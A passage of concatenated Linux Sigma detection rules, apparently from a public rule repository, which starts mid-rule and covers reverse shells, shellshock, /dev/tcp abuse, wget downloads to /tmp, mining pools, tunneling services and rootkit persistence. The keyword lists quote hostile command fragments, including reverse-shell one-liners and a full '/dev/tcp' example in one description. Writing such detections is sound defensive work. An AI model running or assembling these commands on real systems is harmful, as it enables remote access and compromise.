tcp-connect*' - '*echo binary >>*' # Malware - '*wget *; chmod +x*' - '*wget *; chmod 777 *' - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - '*stop;service iptables stop;*' - '*stop;SuSEfirewall2 stop;*' - 'chmod 777 2020*' - '*>>/etc/rc.local' # Metasploit framework exploit codes - '*base64 -d /tmp/*' - '* | base64 -d *' - '*/chmod u+s *' - '*chmod +s /tmp/*' - '*chmod u+s /tmp/*' - '* /tmp/haxhax*' - '* /tmp/ns_sploit*' - 'nc -l -p *' - 'cp /bin/ksh *' - 'cp /bin/sh *' - '* /tmp/*.b64 *' - '*/tmp/ysocereal.jar*' - '*/tmp/x *' - '*; chmod +x /tmp/*' - '*;chmod +x /tmp/*' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/lnx_shell_susp_log_entries.yml ================================================ title: Suspicious Log Entries id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 status: test description: Detects suspicious log entries in Linux log files references: - https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml author: Florian Roth (Nextron Systems) date: 2017-03-25 modified: 2021-11-27 tags: - attack.impact logsource: product: linux detection: keywords: # Generic suspicious log lines - 'entered promiscuous mode' # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml - 'Deactivating service' - 'Oversized packet received from' - 'imuxsock begins to drop messages' condition: keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/builtin/lnx_shell_susp_rev_shells.yml ================================================ title: Suspicious Reverse Shell Command Line id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab status: test description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell references: - https://alamot.github.io/reverse_shells/ author: 
Florian Roth (Nextron Systems) date: 2019-04-02 modified: 2021-11-27 tags: - attack.execution - attack.t1059.004 logsource: product: linux detection: keywords: - 'BEGIN {s = "/inet/tcp/0/' - 'bash -i >& /dev/tcp/' - 'bash -i >& /dev/udp/' - 'sh -i >$ /dev/udp/' - 'sh -i >$ /dev/tcp/' - '&& while read line 0<&5; do' - '/bin/bash -c exec 5<>/dev/tcp/' - '/bin/bash -c exec 5<>/dev/udp/' - 'nc -e /bin/sh ' - '/bin/sh | nc' - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' - '/bin/sh -i <&3 >&3 2>&3' - 'uname -a; w; id; /bin/bash -i' - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' - 'rm -f /tmp/p; mknod /tmp/p p &&' - ' | /bin/bash | telnet ' - ',echo=0,raw tcp-listen:' - 'nc -lvvp ' - 'xterm -display 1' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/lnx_shellshock.yml ================================================ title: Shellshock Expression id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e status: test description: Detects shellshock expressions in log files references: - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf author: Florian Roth (Nextron Systems) date: 2017-03-14 modified: 2022-10-09 tags: - attack.persistence - attack.t1505.003 logsource: product: linux detection: keywords: - '(){:;};' - '() {:;};' - '() { :;};' - '() { :; };' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: 
rules/linux/builtin/lnx_susp_dev_tcp.yml ================================================ title: Suspicious Use of /dev/tcp id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c status: test description: Detects suspicious command with /dev/tcp references: - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ - https://book.hacktricks.xyz/shells/shells/linux - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan author: frack113 date: 2021-12-10 modified: 2023-01-06 tags: - attack.reconnaissance logsource: product: linux detection: keywords: - 'cat /dev/tcp/' - 'echo >/dev/tcp/' - 'bash -i >& /dev/tcp/' - 'sh -i >& /dev/udp/' - '0<&196;exec 196<>/dev/tcp/' - 'exec 5<>/dev/tcp/' - '(sh)0>/dev/tcp/' - 'bash -c ''bash -i >& /dev/tcp/' - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' condition: keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/builtin/lnx_susp_jexboss.yml ================================================ title: JexBoss Command Sequence id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae status: test description: Detects suspicious command sequence that JexBoss references: - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A author: Florian Roth (Nextron Systems) date: 2017-08-24 modified: 2025-11-22 tags: - attack.execution - attack.t1059.004 logsource: product: linux detection: keywords: '|all': - 'bash -c /bin/bash' - '&/dev/tcp/' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/lnx_symlink_etc_passwd.yml ================================================ title: Symlink Etc Passwd id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523 status: test description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd references: - https://www.qualys.com/2021/05/04/21nails/21nails.txt author: 
Florian Roth (Nextron Systems) date: 2019-04-05 modified: 2021-11-27 tags: - attack.t1204.001 - attack.execution logsource: product: linux detection: keywords: - 'ln -s -f /etc/passwd' - 'ln -s /etc/passwd' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml ================================================ title: Suspicious OpenSSH Daemon Error id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc status: test description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts references: - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml author: Florian Roth (Nextron Systems) date: 2017-06-30 modified: 2021-11-27 tags: - attack.initial-access - attack.t1190 logsource: product: linux service: sshd detection: keywords: - 'unexpected internal error' - 'unknown or unsupported key type' - 'invalid certificate signing key' - 'invalid elliptic curve value' - 'incorrect signature' - 'error in libcrypto' - 'unexpected bytes remain after decoding' - 'fatal: buffer_get_string: bad string' - 'Local: crc32 compensation attack' - 'bad client public DH value' - 'Corrupted MAC on input' condition: keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml ================================================ title: Disabling Security Tools - Builtin id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 related: - id: e3a8a052-111f-4606-9aee-f28ebeb76776 type: derived status: test description: Detects disabling security tools references: - 
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020-06-17 modified: 2022-11-26 tags: - attack.defense-evasion - attack.t1562.004 logsource: product: linux service: syslog detection: keywords: - 'stopping iptables' - 'stopping ip6tables' - 'stopping firewalld' - 'stopping cbdaemon' - 'stopping falcon-sensor' condition: keywords falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/builtin/syslog/lnx_syslog_susp_named.yml ================================================ title: Suspicious Named Error id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 status: test description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts references: - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml author: Florian Roth (Nextron Systems) date: 2018-02-20 modified: 2022-10-05 tags: - attack.initial-access - attack.t1190 logsource: product: linux service: syslog detection: keywords: - ' dropping source port zero packet from ' - ' denied AXFR from ' - ' exiting (due to fatal error)' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml ================================================ title: Suspicious VSFTPD Error Messages id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe status: test description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts references: - https://github.com/dagwieers/vsftpd/ author: Florian Roth (Nextron Systems) date: 2017-07-05 modified: 2021-11-27 tags: - attack.initial-access - attack.t1190 logsource: product: linux service: vsftpd 
detection: keywords: - 'Connection refused: too many sessions for this address.' - 'Connection refused: tcp_wrappers denial.' - 'Bad HTTP verb.' - 'port and pasv both active' - 'pasv and port both active' - 'Transfer done (but failed to open directory).' - 'Could not set file modification time.' - 'bug: pid active in ptrace_sandbox_free' - 'PTRACE_SETOPTIONS failure' - 'weird status:' - 'couldn''t handle sandbox event' - 'syscall * out of bounds' - 'syscall not permitted:' - 'syscall validate failed:' - 'Input line too long.' - 'poor buffer accounting in str_netfd_alloc' - 'vsf_sysutil_read_loop' condition: keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/file_event/file_event_lnx_doas_conf_creation.yml ================================================ title: Linux Doas Conf File Creation id: 00eee2a5-fdb0-4746-a21d-e43fbdea5681 status: stable description: Detects the creation of doas.conf file in linux host platform. references: - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/ - https://www.makeuseof.com/how-to-install-and-use-doas/ author: Sittikorn S, Teoderick Contreras date: 2022-01-20 modified: 2022-12-31 tags: - attack.defense-evasion - attack.privilege-escalation - attack.t1548 logsource: product: linux category: file_event detection: selection: TargetFilename|endswith: '/etc/doas.conf' condition: selection falsepositives: - Unlikely level: medium ================================================ FILE: rules/linux/file_event/file_event_lnx_persistence_cron_files.yml ================================================ title: Persistence Via Cron Files id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 status: test description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. 
references: - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2022-12-31 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.t1053.003 logsource: product: linux category: file_event detection: selection1: TargetFilename|startswith: - '/etc/cron.d/' - '/etc/cron.daily/' - '/etc/cron.hourly/' - '/etc/cron.monthly/' - '/etc/cron.weekly/' - '/var/spool/cron/crontabs/' selection2: TargetFilename|contains: - '/etc/cron.allow' - '/etc/cron.deny' - '/etc/crontab' condition: 1 of selection* falsepositives: - Any legitimate cron file. level: medium ================================================ FILE: rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml ================================================ title: Persistence Via Sudoers Files id: ddb26b76-4447-4807-871f-1b035b2bfa5d status: test description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. 
references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh author: Nasreddine Bencherchali (Nextron Systems) date: 2022-07-05 modified: 2022-12-31 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.t1053.003 logsource: product: linux category: file_event detection: selection: TargetFilename|startswith: '/etc/sudoers.d/' condition: selection falsepositives: - Creation of legitimate files in sudoers.d folder part of administrator work level: medium ================================================ FILE: rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml ================================================ title: Suspicious Filename with Embedded Base64 Commands id: 179b3686-6271-4d87-807d-17d843a8af73 status: experimental description: | Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns. references: - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/ author: '@kostastsale' date: 2025-11-22 tags: - attack.execution - attack.t1059.004 - attack.defense-evasion - attack.t1027 logsource: product: linux category: file_event detection: selection: TargetFilename|contains: - '{echo' - '{base64,-d}' condition: selection falsepositives: - Legitimate files with similar naming patterns (very unlikely). level: high ================================================ FILE: rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml ================================================ title: Potentially Suspicious Shell Script Creation in Profile Folder id: 13f08f54-e705-4498-91fd-cce9d9cee9f1 status: test description: Detects the creation of shell scripts under the "profile.d" path. 
references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.persistence logsource: product: linux category: file_event detection: selection: TargetFilename|contains: '/etc/profile.d/' TargetFilename|endswith: - '.csh' - '.sh' condition: selection falsepositives: - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. - Regular file creation during system update or software installation by the package manager level: low # Can be increased to a higher level after some tuning ================================================ FILE: rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml ================================================ title: Triple Cross eBPF Rootkit Default LockFile id: c0239255-822c-4630-b7f1-35362bcb8f44 status: test description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. 
references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 author: Nasreddine Bencherchali (Nextron Systems) date: 2022-07-05 modified: 2022-12-31 tags: - attack.defense-evasion logsource: product: linux category: file_event detection: selection: TargetFilename: '/tmp/rootlog' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml ================================================ title: Triple Cross eBPF Rootkit Default Persistence id: 1a2ea919-d11d-4d1e-8535-06cda13be20f status: test description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method references: - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh author: Nasreddine Bencherchali (Nextron Systems) date: 2022-07-05 modified: 2022-12-31 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.defense-evasion - attack.t1053.003 logsource: product: linux category: file_event detection: selection: TargetFilename|endswith: 'ebpfbackdoor' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml ================================================ title: Wget Creating Files in Tmp Directory id: 35a05c60-9012-49b6-a11f-6bab741c9f74 status: test description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - 
https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.command-and-control - attack.t1105 logsource: product: linux category: file_event detection: selection: Image|endswith: '/wget' TargetFilename|startswith: - '/tmp/' - '/var/tmp/' condition: selection falsepositives: - Legitimate downloads of files in the tmp folder. level: medium ================================================ FILE: rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml ================================================ title: Linux Reverse Shell Indicator id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: test description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md author: Florian Roth (Nextron Systems) date: 2021-10-16 modified: 2022-12-25 tags: - attack.execution - attack.t1059.004 logsource: product: linux category: network_connection detection: selection: Image|endswith: '/bin/bash' filter: DestinationIp: - '127.0.0.1' - '0.0.0.0' condition: selection and not filter falsepositives: - Unknown level: critical ================================================ FILE: rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml ================================================ title: Linux Crypto Mining Pool Connections id: a46c93b7-55ed-4d27-a41b-c259456c4746 status: stable description: Detects process connections to a Monero crypto mining pool references: - https://www.poolwatch.io/coin/monero author: Florian Roth (Nextron Systems) date: 2021-10-26 tags: - attack.impact - attack.t1496 logsource: product: linux category: network_connection detection: selection: 
DestinationHostname: - 'pool.minexmr.com' - 'fr.minexmr.com' - 'de.minexmr.com' - 'sg.minexmr.com' - 'ca.minexmr.com' - 'us-west.minexmr.com' - 'pool.supportxmr.com' - 'mine.c3pool.com' - 'xmr-eu1.nanopool.org' - 'xmr-eu2.nanopool.org' - 'xmr-us-east1.nanopool.org' - 'xmr-us-west1.nanopool.org' - 'xmr-asia1.nanopool.org' - 'xmr-jp1.nanopool.org' - 'xmr-au1.nanopool.org' - 'xmr.2miners.com' - 'xmr.hashcity.org' - 'xmr.f2pool.com' - 'xmrpool.eu' - 'pool.hashvault.pro' - 'moneroocean.stream' - 'monerocean.stream' condition: selection falsepositives: - Legitimate use of crypto miners level: high ================================================ FILE: rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml ================================================ title: Communication To LocaltoNet Tunneling Service Initiated - Linux id: c4568f5d-131f-4e78-83d4-45b2da0ec4f1 status: test description: | Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. references: - https://localtonet.com/documents/supported-tunnels - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications author: Andreas Braathen (mnemonic.io) date: 2024-06-17 tags: - attack.command-and-control - attack.t1572 - attack.t1090 - attack.t1102 logsource: category: network_connection product: linux detection: selection: DestinationHostname|endswith: - '.localto.net' - '.localtonet.com' Initiated: 'true' condition: selection falsepositives: - Legitimate use of the LocaltoNet service. 
level: high ================================================ FILE: rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml ================================================ title: Communication To Ngrok Tunneling Service - Linux id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6 status: test description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data by malicious actors references: - https://twitter.com/hakluke/status/1587733971814977537/photo/1 - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent author: Florian Roth (Nextron Systems) date: 2022-11-03 tags: - attack.exfiltration - attack.command-and-control - attack.t1567 - attack.t1568.002 - attack.t1572 - attack.t1090 - attack.t1102 - attack.s0508 logsource: product: linux category: network_connection detection: selection: DestinationHostname|contains: - 'tunnel.us.ngrok.com' - 'tunnel.eu.ngrok.com' - 'tunnel.ap.ngrok.com' - 'tunnel.au.ngrok.com' - 'tunnel.sa.ngrok.com' - 'tunnel.jp.ngrok.com' - 'tunnel.in.ngrok.com' condition: selection falsepositives: - Legitimate use of ngrok level: high ================================================ FILE: rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml ================================================ title: Potentially Suspicious Malware Callback Communication - Linux id: dbfc7c98-04ab-4ab7-aa94-c74d22aa7376 related: - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 type: derived status: test description: | Detects programs that connect to known malware callback ports based on threat intelligence reports. 
references: - https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections - https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team - https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html - https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html - https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors author: hasselj date: 2024-05-10 tags: - attack.persistence - attack.command-and-control - attack.t1571 logsource: category: network_connection product: linux detection: selection: Initiated: 'true' DestinationPort: - 888 - 999 - 2200 - 2222 - 4000 - 4444 - 6789 - 8531 - 50501 - 51820 filter_main_local_ranges: DestinationIp|cidr: - '127.0.0.0/8' - '10.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' - '169.254.0.0/16' - '::1/128' # IPv6 loopback - 'fe80::/10' # IPv6 link-local addresses - 'fc00::/7' # IPv6 private addresses condition: selection and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml ================================================ title: Shell Invocation via Apt - Linux id: bb382fd5-b454-47ea-a264-1828e4c766d6 status: test description: | Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. 
references: - https://gtfobins.github.io/gtfobins/apt/ - https://gtfobins.github.io/gtfobins/apt-get/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-12-28 modified: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/apt' - '/apt-get' CommandLine|contains: 'APT::Update::Pre-Invoke::=' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_at_command.yml ================================================ title: Scheduled Task/Job At id: d2d642d7-b393-43fe-bae4-e81ed5915c4b status: stable description: | Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md author: Ömer Günal, oscd.community date: 2020-10-06 modified: 2022-07-07 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.t1053.002 logsource: product: linux category: process_creation detection: selection: Image|endswith: - '/at' - '/atd' condition: selection falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml ================================================ title: Audit Rules Deleted Via Auditctl id: bed26dea-4525-47f4-b24a-76e30e44ffb0 status: experimental description: | Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. 
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. Removal of audit rules can significantly impair detection of malicious activities on the affected system. references: - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012 - https://linux.die.net/man/8/auditct author: Mohamed LAKRI date: 2025-10-17 tags: - attack.defense-evasion - attack.t1562.012 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/auditctl' CommandLine|re: '-D' condition: selection falsepositives: - An administrator troubleshooting. Investigate all attempts. level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml ================================================ title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux id: 36388120-b3f1-4ce9-b50b-280d9a7f4c04 status: experimental description: | Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. references: - https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm author: Milad Cheraghi date: 2025-10-18 tags: - attack.execution - attack.defense-evasion - attack.t1562.001 logsource: product: linux category: process_creation detection: selection: Image|endswith: # Note: Add the list of shells allowed in your environment that can be used to run init.d scripts. 
- '/systemctl' - '/bash' - '/sh' CommandLine|contains|all: - 'stop' - 'kesl' condition: selection falsepositives: - System administrator manually stopping Kaspersky services level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml ================================================ title: Suspicious Invocation of Shell via AWK - Linux id: 8c1a5675-cb85-452f-a298-b01b22a51856 status: test description: | Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. references: - https://gtfobins.github.io/gtfobins/awk/#shell - https://gtfobins.github.io/gtfobins/gawk/#shell - https://gtfobins.github.io/gtfobins/nawk/#shell - https://gtfobins.github.io/gtfobins/mawk/#shell author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) 
date: 2024-09-02 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: - '/awk' - '/gawk' - '/mawk' - '/nawk' CommandLine|contains: 'BEGIN {system' selection_cli: CommandLine|contains: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_base64_decode.yml ================================================ title: Decode Base64 Encoded Text id: e2072cab-8c9a-459b-b63c-40ae79e27031 status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1027 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/base64' CommandLine|contains: '-d' # Also covers "--decode" condition: selection falsepositives: - Legitimate activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_base64_execution.yml ================================================ title: Linux Base64 Encoded Pipe to Shell id: ba592c6d-6888-43c3-b8c6-689b8fe47337 status: test description: Detects suspicious process command line that uses base64 encoded input for execution with a shell references: - https://github.com/arget13/DDexec - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally author: pH-T (Nextron Systems) date: 2022-07-26 modified: 2023-06-16 tags: - attack.defense-evasion - attack.t1140 logsource: product: linux category: process_creation detection: selection_base64: CommandLine|contains: 'base64 ' selection_exec: - CommandLine|contains: - 
'| bash ' - '| sh ' - '|bash ' - '|sh ' - CommandLine|endswith: - ' |sh' - '| bash' - '| sh' - '|bash' condition: all of selection_* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml ================================================ title: Linux Base64 Encoded Shebang In CLI id: fe2f9663-41cb-47e2-b954-8a228f3b9dff status: test description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded references: - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.defense-evasion - attack.t1140 logsource: product: linux category: process_creation detection: selection: CommandLine|contains: - "IyEvYmluL2Jhc2" # Note: #!/bin/bash" - "IyEvYmluL2Rhc2" # Note: #!/bin/dash" - "IyEvYmluL3pza" # Note: #!/bin/zsh" - "IyEvYmluL2Zpc2" # Note: #!/bin/fish - "IyEvYmluL3No" # Note: # !/bin/sh" condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml ================================================ title: Bash Interactive Shell id: 6104e693-a7d6-4891-86cb-49a258523559 status: test description: Detects execution of the bash shell with the interactive flag "-i". 
references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ - https://linux.die.net/man/1/bash author: '@d4ns4n_' date: 2023-04-07 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|endswith: '/bash' CommandLine|contains: ' -i ' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml ================================================ title: Enable BPF Kprobes Tracing id: 7692f583-bd30-4008-8615-75dab3f08a99 status: test description: Detects common command used to enable bpf kprobes tracing references: - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - https://bpftrace.org/ - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html author: Nasreddine Bencherchali (Nextron Systems) date: 2023-01-25 tags: - attack.execution - attack.defense-evasion logsource: category: process_creation product: linux detection: selection: CommandLine|contains|all: - 'echo 1 >' - '/sys/kernel/debug/tracing/events/kprobes/' CommandLine|contains: - '/myprobe/enable' - '/myretprobe/enable' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml ================================================ title: BPFtrace Unsafe Option Usage id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 status: test description: Detects the usage of the unsafe bpftrace option references: - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - https://bpftrace.org/ author: Andreas Hunkeler (@Karneades) date: 2022-02-11 tags: - attack.execution - attack.t1059.004 logsource: category: process_creation product: linux detection: selection: Image|endswith: 'bpftrace' CommandLine|contains: '--unsafe' condition: selection 
